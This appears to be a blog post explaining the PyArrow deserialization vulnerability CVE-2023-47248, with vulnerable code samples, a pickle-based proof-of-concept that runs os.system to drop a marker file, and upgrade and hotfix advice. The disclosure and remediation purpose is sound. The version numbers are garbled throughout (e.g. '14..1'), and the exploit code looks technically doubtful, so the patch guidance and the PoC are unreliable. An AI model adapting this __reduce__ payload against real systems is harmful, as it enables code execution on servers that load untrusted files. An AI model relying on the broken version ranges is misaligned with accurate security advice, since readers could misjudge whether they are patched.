In November 2023, a major security vulnerability was disclosed for PyArrow, identified as CVE-2023-47248. This flaw lurks in the way PyArrow handles deserializing data, specifically for Arrow IPC, Feather, and Parquet files. In simple terms, if your Python application loads these formats from untrusted sources (such as files uploaded by users), an attacker could run arbitrary code on your system. This is about as bad as it gets: attackers could take over servers, steal data, or run any software they want.

In this post, we'll break down what the vulnerability means, its impact, sample exploits, and—crucially—how to protect yourself. We’ll also provide exclusive insights, practical code snippets, and direct links to the official references.

What Is PyArrow and Why Does This Matter?

PyArrow is a popular Python library that lets you read and write Apache Arrow, Parquet, and Feather files. These formats are common across data science, analytics, and machine learning pipelines. Many frameworks—like Pandas, Dask, and even some Spark setups—use PyArrow under the hood.

The problem: If your application loads Arrow IPC, Feather, or Parquet files from user uploads or public locations, a poisoned file can trigger remote code execution (RCE).

Cause of CVE-2023-47248: Deserialization of Untrusted Data

The core issue is unsafe deserialization.

PyArrow would load object data directly from Arrow IPC, Feather, or Parquet files.

- If the file was malicious, it could contain crafted input that triggers the Python’s pickle module internally—or similar unsafe deserialization paths—allowing the attacker to execute arbitrary Python code.

> This only affects PyArrow. Other Apache Arrow implementations are not vulnerable.

Official PyArrow security advisory:

- GHSA-x6mp-9h99-jz6g
- PyPI PyArrow Hotfix

How Can This Be Exploited? An Example

Let’s say you’re running a Flask web app where users can upload files, and you load them using PyArrow or via Pandas (e.g., pandas.read_parquet). Here’s a simplified vulnerable code sample:

import pyarrow.parquet as pq

def handle_uploaded_file(filepath):
    # VULNERABLE: Don't load files from untrusted sources like this!
    table = pq.read_table(filepath)
    # Further processing...

An attacker could upload a “parquet” file with an embedded payload. When pq.read_table(filepath) is called, their code runs—possibly creating a reverse shell, stealing credentials, etc.

Even if you use pandas

import pandas as pd

def upload(file):
    # VULNERABLE if underlying pyarrow is affected
    df = pd.read_parquet(file)

Please use this code for education only!

Suppose an attacker generates a malicious Parquet file that, when deserialized, runs arbitrary Python code:

import pandas as pd
import pickle
import pyarrow as pa
import pyarrow.parquet as pq

class Exploit:
    def __reduce__(self):
        import os
        return (os.system, ('touch /tmp/owned_by_pyarrow',))  # Example: create a marker file

# Craft a DataFrame with a malicious object column
df = pd.DataFrame({'payload': [Exploit()]})

# Save as Parquet
table = pa.Table.from_pandas(df)
pq.write_table(table, 'badfile.parquet')

# When read by a vulnerable system, arbitrary code executes:
pd.read_parquet('badfile.parquet')  # This will create /tmp/owned_by_pyarrow

Note: Recent PyArrow and other Pandas/Arrow updates address this, but with versions .14. to 14.., the code above is a remote execution vector if file origins are not trusted!

Your app uses PyArrow .14. up to but not including 14..1

- Reads Arrow IPC, Feather, or Parquet from locations that could be controlled by an attacker (e.g., file uploads, internet downloads, unvetted third-party sources)

Your PyArrow is version 14..1 or above.

- You have applied the hotfix package.

The PyArrow team quickly patched this. Upgrade as follows

pip install --upgrade pyarrow
# or for conda users
conda update pyarrow

Check your installed version

import pyarrow
print(pyarrow.__version__)
# Must be 14..1 or later

Install the hotfix package (works for most old versions)

pip install pyarrow-hotfix

See full details here

This disables the vulnerable feature by monkey-patching the affected code paths.

3. Downstream Dependencies

If you develop libraries or applications that depend on PyArrow, declare a dependency requiring at least 14..1 in your requirements.txt or pyproject.toml:

pyarrow >= 14..1

Key References and Further Reading

- Apache Arrow Security Advisory
- PyPI pyarrow-hotfix package
- Arrow 14..1 Release Notes
- CVE-2023-47248 on MITRE

Takeaways

- CVE-2023-47248 is a critical remote code execution bug in PyArrow’s deserialization; real world exploits are simple if you process untrusted files.

Upgrade immediately to PyArrow 14..1 or later, or apply the hotfix if you cannot upgrade.

- Never deserialize files from untrusted sources without input validation and sandboxing—even with patched dependencies.

The world of data science and analytics moves fast. But as this PyArrow case shows, don’t forget to lock your (virtual) doors.

Timeline

Published on: 11/09/2023 09:15:08 UTC
Last modified on: 11/29/2023 03:15:42 UTC